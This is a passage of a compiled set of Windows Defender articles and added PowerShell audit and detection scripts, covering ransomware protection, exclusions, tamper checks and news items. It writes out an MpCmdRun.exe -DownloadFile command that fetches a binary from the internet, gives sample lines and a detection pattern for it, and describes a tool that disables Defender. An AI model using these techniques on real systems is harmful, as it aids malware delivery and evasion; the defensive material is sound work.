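    $current = if ($null -eq $v) { '<absent>' } else { $v }
    [pscustomobject]@{
        Key     = $c.Key
        Value   = $c.Name
        Current = $current
        Flag    = ($v -eq $c.Bad)
    }
}
$findings | Format-Table -AutoSize

# Cross-check with the engine's own view: a policy can be written before it has
# taken effect, and tamper protection (if on) should have refused it outright.
Get-MpComputerStatus | Select-Object AntivirusEnabled, RealTimeProtectionEnabled, IsTamperProtected

if ($findings.Flag -contains $true) {
    Write-Warning 'Defender/Windows Update policy matches the Novter pattern; treat as an incident unless an administrator set it.'
}
```

On a host that is not domain- or MDM-managed, the Policies keys should normally be empty; any DisableAntiSpyware or DisableRealtimeMonitoring value there is worth an alert, not only the exact combination Novter writes.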
  13. The free, built-in antivirus software in Windows 10 performs just as well as -- or even better than -- many of its paid competitors.

After years of lagging behind competitors, Microsoft Windows Defender has earned a coveted AV-Test "Top Product" award. Your Windows PC can now repel the vast majority of malware threats right out of the box.

AV-Test, a German testing lab, periodically evaluates security suites for Windows, Mac, Android and occasionally Linux systems. As recently as 2015, Microsoft Windows Defender ranked among the weakest antivirus programs on the market. Since then, however, Microsoft has been making steady strides toward the top, and the tech giant's efforts finally paid off in AV-Test's latest rounds of tests.

While it has yet to achieve a perfect score — something that rivals Avira, Kaspersky Lab and McAfee were able to accomplish — Microsoft can finally make a convincing argument that you don't really need to install a third-party antivirus program to protect Windows 10. (Microsoft's Windows 7 security protocols earned similar accolades back in March.)

For those of you not familiar with AV-Test's protocols, it rates software out of a possible 18 points: six for protection, six for performance and six for usability. Anything that gets a 17.5 or 18 is a Top Product; anything that gets below a 10 is not recommended.

This time around, all 18 programs evaluated did pretty well. Avira Antivirus Pro, Kaspersky Lab Internet Security and McAfee Internet Security all earned perfect 18s. (McAfee, like Microsoft, was an underdog in AV-Test's rankings for a long time.) Ahn Lab V3 Internet Security, Avast Free Antivirus, Bitdefender Internet Security, Microsoft Windows Defender, Microworld eScan Internet Security Suite, Symantec Norton Security and VIPRE Security all earned 17.5 points apiece, which also made them AV-Test Top Products.

At the other end of the spectrum were Comodo Internet Security with 15.5 points, and F-Secure Safe with 16 points. However, since both of these programs earned perfect 6s for protection, they are capable of keeping your PC safe; it's just a matter of performance and usability. BullGuard Internet Security, G Data InternetSecurity, K7 Computing TotalSecurity, PC Pitstop PC Matic and Trend Micro Internet Security all earned 16.5 or 17 points, which means they're all reliable and functional, but not the absolute best the AV market has to offer.

No matter what program you use, though, there's a lot of good news in this round of AV-Test's rankings. More than half of the programs tested earned top marks, and even the laggards stopped just about every piece of malware dead in its tracks. Furthermore, thanks to Windows Defender, you can now keep your computer pretty safe just by following recommended Windows protocols.

Source
  14. How to enable Ransomware Protection in Windows Defender and add custom folders to it

Windows Defender has been gaining a foothold steadily for the past few years. But there is one flaw in the antivirus that ships with Windows 10: the option for Ransomware Protection is disabled by default, even though it has been available as a native option since the release of Windows 10 version 1709. Initially I was bemused by this, but then I thought it is possible that Windows Defender could identify a legitimate application as a threat and block it, which is not something the user would want. Quite a few third-party anti-ransomware programs exist and they suffer from false positive issues as well. Check out our reviews of AppCheck AntiRansomware, Acronis Ransomware Protection, TrendMicro Ransombuster, or our overview of Anti-Ransomware software for Windows to get started.

For those unaware, ransomware is one of the deadliest forms of malware. It silently encrypts your data (pictures, videos, documents are commonly targeted), thus preventing you from accessing them. It may even lock the bootloader when you reboot/turn off the computer. The malware displays a screen demanding a ransom from the user which usually involves a crypto-currency payment address that you have to send money to. There is no guarantee that a payment will provide the unlock key required to regain access to files that the ransomware encrypted while it ran on the system. Ransomware attacks are often accompanied by a timer to add another pressure layer to the ransom demand. Affected users are asked to pay the amount in time as they won't be able to decrypt their files anymore once the timer runs out. Decryption tools are available for some ransomware types, but these are usually released after an outbreak and not available right from the get-go. Many companies, hospitals, and users have fallen victim to ransomware already.

You may have heard of the ruckus caused world-wide by the WannaCry ransomware back in 2017, and that is just one example of ransomware causing havoc worldwide. Besides being very cautious when using the computer, there are only a few options to protect against ransomware attacks. Two of the most effective are backups and security software that protects against ransomware.

How to enable Ransomware Protection in Windows Defender

1. Open the Windows Security Dashboard by double-clicking on the Defender taskbar icon (or use the Settings app and select Update & Security > Windows Security).
2. Click on Virus & Threat Protection.
3. Scroll down to Ransomware Protection.
4. Click on Manage Ransomware Protection (click Okay on the UAC pop-up if it is displayed).
5. On the next page, you will find a toggle for Controlled Folder Access. Enable the option.

That's it.

Most antivirus programs use behavioral scanning to prevent zero-day attacks (new or unidentified malware). In other words, they monitor your computer's services, applications, anything in the background, for suspicious activity. For example, when an otherwise harmless file tries to gain access to your documents folder to execute a script that encrypts the files in it, Windows Defender will stop the malware to protect your data. It's a sort of intrusion prevention or anti-exploit method.

By default, the Ransomware Protection only covers specific folders. To view the ones that are secured, click on the Protected Folders option. It's just the User folders like Documents, Pictures, Videos, Music, Desktop, Favorites by default.

Tip: Add blocked programs to Controlled Folder Access' whitelist

So, what happens if ransomware targets files in other folders? The files are affected unless the ransomware is quarantined before it starts to encrypt files on the device. Fortunately, there is a way to secure them. There is an option at the top of the Protected Folders screen which says "Add a protected folder". Click on it and choose any folder you want and it will be protected by Windows Defender. The folders can be on any partition or hard drive: they will be secured by the feature.

This method is not completely fool-proof but it's better than nothing. You might want to back up your data to an external drive regularly as well. Don't forget to check out ConfigureDefender for more control.

Source: How to enable Ransomware Protection in Windows Defender and add custom folders to it (gHacks)
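The same setup done from an elevated PowerShell prompt, as an added example that is not part of the gHacks article: it enables Controlled Folder Access, adds custom folders, whitelists a program the feature blocked (the "Tip" above), and then reads back the Defender event log to see what has actually been stopped. The folder paths and the whitelisted application are assumptions chosen for the example; the cmdlets and event IDs are the ones Defender ships with.

```powershell
# Added example (not from the gHacks article): Controlled Folder Access from PowerShell.
# Run as Administrator. Folder paths and the trusted app path are assumptions.
#Requires -RunAsAdministrator

$extraFolders = @('D:\Projects', 'E:\Photos')           # assumed: folders outside the user profile
$trustedApp   = 'C:\Program Files\MyBackup\backup.exe'  # assumed: a legitimate app CFA blocked

# 1. Turn the feature on. 'AuditMode' only logs what would have been blocked, which is a
#    safer first step on a machine with unusual software; 'Enabled' enforces.
Set-MpPreference -EnableControlledFolderAccess Enabled

# 2. Protect folders beyond the default user folders. Subfolders are covered, and the
#    folders may sit on any drive.
Add-MpPreference -ControlledFolderAccessProtectedFolders $extraFolders

# 3. Whitelist a program that CFA blocked by mistake. The allowance is by path, so an
#    attacker who can write to that path inherits it: only whitelist binaries you trust.
Add-MpPreference -ControlledFolderAccessAllowedApplications $trustedApp

# 4. Verify what is now in effect.
Get-MpPreference | Select-Object EnableControlledFolderAccess,
    ControlledFolderAccessProtectedFolders,
    ControlledFolderAccessAllowedApplications

# 5. Review what CFA has stopped. Event 1123 = write blocked, 1124 = audit-mode
#    "would have been blocked", both in the Defender operational log.
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'
    Id      = 1123, 1124
} -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message | Format-List
```

Running step 5 after a day in AuditMode is the practical way to find legitimate software that needs whitelisting before switching to Enabled, rather than discovering it when a backup job or an installer fails.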
  15. How to exclude files and folders from Windows Defender scans

Windows 10's built-in antivirus tool Microsoft Defender uses threat signatures, behavioral detection, and machine learning models to automatically detect and block suspicious files, folders, and processes. However, sometimes legitimate programs or programs created by your organization may receive false-positive detections in Windows Defender, leading to the executable being quarantined.

A false positive detected in Microsoft Defender

False positives are particularly common among tools used by cybersecurity researchers that share many of the characteristics of malware but are, in fact, just tools that can be used for good or harmful activity. Fortunately, Microsoft allows you to exclude files and folders so they are not scanned by Microsoft Defender. This feature is for those who need to run apps or programs that have been detected as malicious but that you are confident are safe.

How to use the exclusion feature of Windows Defender

It is important to remember that you should never exclude a file or folder from antivirus scans unless you are 100% sure that they are safe and legitimate files. Otherwise, if you exclude a folder and mistakenly execute malware from it, Microsoft Defender will not detect and quarantine the malware.

To exclude a file or folder from being scanned by Microsoft Defender, please follow these steps:

1. Open the Start Menu and then click on Settings.
2. When the Settings window opens, click on Update & Security, and then select Windows Security.
3. In the Windows Security window, click on Virus & threat protection, as shown by the red arrow below.

The Windows Security settings screen

4. When the Virus & threat protection screen opens, click on the Manage settings option.
5. Under Exclusions, click on Add or remove exclusions.
6. You will now be at the Exclusions screen, where you can add a new excluded file, folder, file type, or process. To exclude one of these items, click on Add an exclusion and select the type of item you wish to exclude.

When excluding a file or folder, you will be asked to select the file/folder you wish to exclude. If you wish to exclude a file type, you need to specify a file type extension to exclude. For example, '.txt' would exclude all files ending with the .txt extension from Microsoft Defender scans. Finally, if you exclude a process, you should enter the full path to the executable. For example, 'C:\exclude\test.exe'.

When done adding exclusions, you can close the Windows Security settings screen. Once added, Windows Defender will not scan or detect your file or app as malicious. It's also worth noting that a folder exclusion will apply to all subfolders within the folder as well.

Source: How to exclude files and folders from Windows Defender scans
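The same four exclusion types managed from PowerShell, as an added example that is not part of the BleepingComputer article. It adds, lists and removes exclusions, and spells out the one distinction the Settings UI hides: a process exclusion skips files that process opens, not the process binary itself. The tool paths are assumptions.

```powershell
# Added example (not from the article): Defender exclusions from PowerShell.
# Run as Administrator. The tool directory and executable are assumptions.
#Requires -RunAsAdministrator

$toolDir = 'C:\Tools\research'           # assumed: folder holding security-research tools
$toolExe = 'C:\Tools\research\scan.exe'  # assumed: one tool that keeps getting quarantined

# The four exclusion kinds the UI offers.
Add-MpPreference -ExclusionPath      $toolDir   # folder: covers every subfolder too
Add-MpPreference -ExclusionPath      $toolExe   # single file
Add-MpPreference -ExclusionExtension 'iso'      # file type; the leading dot is optional
Add-MpPreference -ExclusionProcess   $toolExe   # files opened BY this process are not scanned;
                                                # the executable itself still is

# List what is excluded. Any local administrator, and therefore any malware already
# running as administrator, can read this list, so each entry is effectively a
# published safe place to drop a payload. Keep it short and review it.
$p = Get-MpPreference
'Paths:';      $p.ExclusionPath
'Extensions:'; $p.ExclusionExtension
'Processes:';  $p.ExclusionProcess

# Remove an exclusion as soon as it is no longer needed.
Remove-MpPreference -ExclusionExtension 'iso'
```

Prefer the narrowest exclusion that solves the false positive: a single file rather than its folder, and a folder rather than a whole extension, since an extension exclusion applies everywhere on the disk.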
  16. qtkite's Defender Control is a portable app capable of turning off Windows Defender without the need to install an antivirus.

This little app makes it simple to turn off Windows Defender without jumping through hoops. Of course, you should always have an up-to-date antivirus solution on your machine. But there are times when you need to turn it off, like when using certain software, for instance. qtkite's Defender Control makes it quick and efficient. The same simplicity is applied to enabling protection; run the enable.exe and it will be active again.

qtkite's Defender Control gains TrustedInstaller permissions and will disable windefender services & smartscreen. It also will disable anti-tamper protection and all relevant registries + wmi settings.

Writeup: If you are interested in how I developed this program check out the writeup here.

Changelog:

Defender Control v1.1 - Jul 24, 2021
- Added enable-defender

Defender Control v1.0 - Jul 22, 2021
- Initial release! Run the .exe to disable defender

VirusTotal: https://www.virustotal.com/gui/file/782ceb859eaa767d4e24ae709d7ab3c0dea3b450c788e04fb2ce4c085e9e8a91/detection

Home: https://github.com/qtkite/defender-control
Changelog / Download Page: https://github.com/qtkite/defender-control/releases

Downloads - v1.1 (includes Disable + Enable Windows Defender):
- disable-defender.exe (40 KB)
- enable-defender.exe (39 KB)
- Source code (zip)
- Source code (tar.gz)

Downloads - v1.0 (only Disable Windows Defender):
- disable-defender.exe (40 KB)
- Source code (zip)
- Source code (tar.gz)
  17. HostsFileHijack: Microsoft Defender falsely reports you are infected if you try to block Microsoft telemetry and ads

Editing your hosts file is one way to block Microsoft telemetry and Microsoft-delivered ads on Windows, and it turns out Microsoft is not too happy with it. The latest versions of Microsoft Defender for Windows 10 will detect if you are adding entries to your hosts file which would block Microsoft’s servers and refuse to allow you to save the file, claiming it is a severe security risk.

In fact Microsoft will claim you are infected with “SettingsModifier:Win32/HostsFileHijack”, which a Google search reveals has caused several users to panic and believe they have a virus. For example:

"I do not have Malwarebytes installed, just Windows Security Defender complaining about SettingsModifier:Win32/HostsFileHijack. I also do not know if it’s related or not, but I got the popup right after launching the game SUPERHOT MIND CONTROL DELETE. I actually know what the HOST file is (a bunch of DNS to IP forwarding), so I was curious how the infection was modifying it, which could give me information on what is wrong. So I “allowed” the threat via Windows Defender and strangely the file remained the same (with just the default 127.0.0.1 and ::1 to localhost lines). I then asked it to “clean” the threat again, and the HOST file content never changed."

With Microsoft weaving Microsoft Defender ever more deeply into Windows, it does bring to mind the question of who actually controls the PC you are using.

via WindowsLatest

Source: HostsFileHijack: Microsoft Defender falsely reports you are infected if you try to block Microsoft telemetry and ads
  18. Windows Defender’s new feature worries security researchers

Windows Defender has added a new feature and security researchers are not too happy, as it has increased the attack surface of Windows. Version 4.18.2007.9 or 4.18.2009.9 of the app has added the ability to download files via the command line using the app, e.g.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

… can now be used to download a binary from the internet. While not an exploit in itself, the feature allows a script which can launch the command line to import further files from the internet using native so-called living-off-the-land binaries or LOLBINs. Adding the feature to Windows Defender means there is another app admins have to keep an eye on and another app which hackers can exploit. Fortunately, Windows Defender does still scan the apps it downloads, but this is of course not infallible.

The new “feature” was discovered by security researcher Mohammad Askar and verified by BleepingComputer. Read more here.

Source: Windows Defender’s new feature worries security researchers
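Since the article's point is that admins now have one more binary to watch, here is the detection side as an added example that is not part of the article: a check that flags MpCmdRun.exe launched with -DownloadFile in process-creation command lines. The three sample command lines are constructed for this example; the live query at the end reads Security event 4688, which requires "Audit Process Creation" and command-line logging to be enabled on the host.

```powershell
# Added example (not from the article): detecting MpCmdRun.exe used as a downloader.
# Sample command lines below are constructed; the live query needs 4688 auditing with
# command-line logging turned on.

# Matches MpCmdRun.exe (any path, quoted or not) followed somewhere by -DownloadFile.
$pattern = '(?i)(^|[\\"\s])MpCmdRun\.exe"?\s+.*-DownloadFile\b'

function Test-MpCmdRunDownload {
    param([Parameter(Mandatory)][string]$CommandLine)
    return [bool]($CommandLine -match $pattern)
}

# Constructed samples: a benign signature update, a download from the platform path,
# and a download launched through cmd.exe with lower-case switch spelling.
$samples = @(
    '"C:\Program Files\Windows Defender\MpCmdRun.exe" -SignatureUpdate',
    '"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -url http://example.test/a.exe -path C:\Users\Public\a.exe',
    'cmd.exe /c MpCmdRun.exe -downloadfile -url http://example.test/b.bin -path C:\Temp\b.bin'
)
foreach ($s in $samples) {
    '{0,-5} {1}' -f (Test-MpCmdRunDownload -CommandLine $s), $s
}

# Live check: recent process-creation events on this host. In a 4688 event the
# command line is property index 8.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 5000 -ErrorAction SilentlyContinue |
    Where-Object { Test-MpCmdRunDownload -CommandLine ([string]$_.Properties[8].Value) } |
    Select-Object TimeCreated, @{ n = 'CommandLine'; e = { $_.Properties[8].Value } }
```

Only the first sample is benign; the other two are flagged. The rule deliberately ignores the path of MpCmdRun.exe, because the legitimate copy lives under a versioned Platform directory that changes with every Defender update, so a path-anchored rule would go stale.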
  19. Microsoft makes it difficult to disable Windows Defender on Windows 10

Microsoft Defender Antivirus is the default antivirus protection on the company's Windows 10 operating system. If administrators don't install a different antivirus solution, Windows Defender Antivirus is enabled and will protect the system in various ways.

Administrators may configure some settings of the program in the Windows 10 Settings application; this includes turning various security features such as cloud delivered protection, tamper protection, exploit protection or ransomware protection on or off. What administrators cannot do is disable the program entirely using the Settings app. Disabling real-time protection offers a temporary recourse only, as it is automatically enabled again by the operating system.

Microsoft released an update for the security program earlier this month that introduced two major changes to it. The first made Microsoft Defender Antivirus flag hosts file manipulations as malicious if they contained entries for certain Microsoft servers, mostly telemetry servers used to submit data from the Windows 10 device to Microsoft. The second change came to light just recently. It appears that Microsoft disabled the Registry key DisableAntiSpyware which administrators could use to disable Microsoft Windows Defender.

Most users should not deactivate Microsoft Defender Antivirus if no other antivirus program is active on the system. In some situations, it may be required to disable the tool:

- If an installed antivirus solution did not lead to Microsoft Defender Antivirus disabling itself.
- If the user needs to disable the software because of incompatibilities.
- If no antivirus software is required.

Our colleagues over at Deskmodder note that third-party software such as Defender Control should still work. The equally excellent Configure Defender may work as well. It is unclear at this point in time if the Group Policy options to disable Windows Defender still work.

Closing Words

Most third-party antivirus solutions come with options to turn off the protection. While not advised, the programs do give users the choice to do so if they choose that option.

Are the two changes in the latest version of Microsoft Windows Defender related? Microsoft is tight lipped about the changes and it seems unlikely that it is going to release a public statement about either of these.

Source: Microsoft makes it difficult to disable Windows Defender on Windows 10
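Whichever way Defender ends up disabled, by a tool such as the Defender Control utility in item 16, by the DisableAntiSpyware key, or by policy, the check a practitioner wants is whether protection is actually running right now. The following read-only audit is an added example and not part of the gHacks article; it reports Defender's live status, reads the documented policy registry locations, and lists tamper-protection events. Nothing here changes any setting.

```powershell
# Added example (not from the article): audit whether Defender is really protecting
# this host and which disable paths are in play. Read-only.

# 1. Live status as reported by the antimalware service itself.
$status = Get-MpComputerStatus
[pscustomobject]@{
    AntivirusEnabled    = $status.AntivirusEnabled
    RealTimeProtection  = $status.RealTimeProtectionEnabled
    TamperProtection    = $status.IsTamperProtected
    SignatureAgeDays    = $status.AntivirusSignatureAge
}

# 2. Policy registry switches that have historically turned Defender off.
#    DisableAntiSpyware = 1 is the key the article says Microsoft has stopped honouring;
#    DisableRealtimeMonitoring = 1 lives one level down.
$keys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender',
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'
)
foreach ($k in $keys) {
    if (Test-Path $k) {
        Get-ItemProperty -Path $k | Select-Object DisableAntiSpyware, DisableRealtimeMonitoring
    } else {
        "$k : not present (no policy set)"
    }
}

# 3. Tamper-protection events. Event 5013 is logged when tamper protection blocks a
#    change to Defender settings, which is what a disabling tool or script produces
#    when it runs against a protected machine.
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5013
} -MaxEvents 10 -ErrorAction SilentlyContinue | Select-Object TimeCreated, Message
```

If step 1 reports RealTimeProtection as False while no third-party antivirus is registered, the host is unprotected regardless of what the Settings app shows, and steps 2 and 3 tell you whether that state came from policy or from something actively fighting tamper protection.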